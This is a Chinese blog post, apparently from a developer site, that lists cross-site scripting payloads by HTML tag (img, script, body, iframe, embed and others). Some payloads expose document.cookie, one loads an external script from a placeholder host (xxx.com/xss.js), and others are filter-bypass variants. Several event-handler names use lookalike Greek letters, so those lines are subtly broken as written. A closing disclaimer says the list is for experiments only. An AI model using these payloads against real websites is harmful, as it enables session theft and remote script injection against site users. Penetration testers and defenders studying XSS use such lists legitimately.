xss 常用语句

本文详细列举了各种HTML标签中可能存在的XSS注入点,如<img>、<script>、<body>、<iframe>、<embed>等,并提醒读者这些代码可能导致的安全威胁。作者强调实验性质,同时指出滥用可能导致的实际后果并非作者责任。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<img> 标签:
<img src=1 οnerrοr=alert(document.cookie)>    //弹cookie
<img src=1 οnerrοr=alert(/hck/)>
<img src=1 οnerrοr=alert("hck")>
<img src=1 οnerrοr=alert(123)>    //对于数字,可以不用引导
<img src="javascript:alert("xss");">
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">

script标签:
<script>alert(1)<script>
<script src=http://xxx.com/xss.js></script>   //引用外部的xss
<script> alert("hack")</script>   
<script> alert(document.cookie)</script>

body 标签:
<body οnlοad=alert("xss")>
<body background="javascript:alert("xss")">


iframe 标签:
<iframe srcdoc="<img src=x οnerrοr=alert(document.domain)>"></frame>     --弹ip
<iframe srcdoc="<img src=x οnerrοr=alert(1)>"></frame>

<embed src=//14.rs>   ---绕过的可能性很大,
<audio controls onduratiοnchange=print(1) id=bngvse><source src=1.mp3 type=audio/mpeg></audio>
<iFrAme/src=jaVascRipt:alert.bind()(1) class=bngvse></iFramE>
<iframe srcdoc="<input onauxclick=alert(1)>" class=bngvse></iframe>

点击:
<button src=1 οnclick=alert("你好")>

<img/src=1 οnerrοr=alert(1) />       --反射型
<a href="javascript:confirm('a')" >1</a >
<iframe src=    "javascript:alert('iframe')" width    = "0" height        = "0"/>
–!><script>prompt(1)</script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

声明:以上xss语句仅用于实验,利用以上语句对某用户、企业、业务造成影响的,一切与作者无关。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

柳岸花又明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值